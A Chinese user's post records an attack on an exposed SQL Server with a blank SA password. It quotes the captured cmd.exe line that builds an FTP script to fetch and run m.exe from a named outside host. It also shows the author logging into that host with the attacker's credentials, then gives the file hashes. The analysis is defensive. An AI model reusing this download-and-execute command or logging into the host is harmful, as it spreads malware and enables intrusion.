今天无意中把我的SQL 1433对外了一下~SA没设置密码~竟然 10分钟不到杀毒软件就提示要启动CMD ` 以下为截获和捕获到的一些资料~
进程:D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
子进程:D:\WINDOWS\system32\cmd.exe
进程参数:/c echo open
dasheng8.3322.org>shm.exe&echo 123>>shm.exe&echo 123>>shm.exe&echo get m.exe sm.exe>>shm.exe&echo bye>>shm.exe&ftp -s:shm.exe&if EXIST sm.exe (start sm.exe)&del shm.exe&exit
经过查询 DNS
Name: dasheng8.3322.org
Address: 202.100.84.174202.100.84.174 的 80端口直接是 中共甘肃省委组织部“12380”举报网站
通过 这个批处理 得到
dasheng8.3322.org 启动的是FTP 帐号密码为123 用FTP命令连接~发现有以下 程序 To dasheng8.3322.org
Connected to dasheng8.3322.org.
220 Serv-U FTP Server v6.4 for WinSock ready...
User (dasheng8.3322.org:(none)): 123
331 User name okay, need password.
Password:
230 User logged in, proceed.
ftp> dir
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
drw-rw-rw- 1 user group 0 Nov 26 21:15 .
drw-rw-rw- 1 user group 0 Nov 26 21:15 ..
-rw-rw-rw- 1 user group 686874624 Nov 16 20:55 220.168.31.250_2011-11-1
6_19-23-37.avi
-rw-rw-rw- 1 user group 207360 Nov 29 13:53 m.exe
-rw-rw-rw- 1 user group 200704 Nov 25 22:17 shijie.exe
-rw-rw-rw- 1 user group 8439973 Nov 15 15:45 白金4.83破解套装.rar-rw-rw-rw- 1 user group 1582127 Nov 25 22:22 发包.rar
226 Transfer complete.
ftp: 484 bytes received in 0.00Seconds 484000.00Kbytes/sec.
ftp>==================================================================附图 从 肉鸡上下载下来的 文件~ 2个EXE 和 2个RAR
文件名称: m.exe
文件大小: 207360 字节
修改时间: 2012年1月2日, 2:23:02
MD5: 3AF2545C5E374AA02319C0745C7A971D
SHA1: 56D7472DEB7B4CE51871D23CE37524975AB0FA1F
CRC32: C8CCEF95
文件名称: shijie.exe
文件大小: 200704 字节
文件版本: 5.2.3790.4566 (srv03_sp2_qfe.090805-1438)
修改时间: 2012年1月2日, 2:23:02
MD5: CFC34A6D40634544AF2F0E5E4DB5BBFD
SHA1: 66C68E224E73EAC669E1A7A8070E7425A9DB0231
CRC32: 0A70DB35
============================================================================
用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0; QQDownload 705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)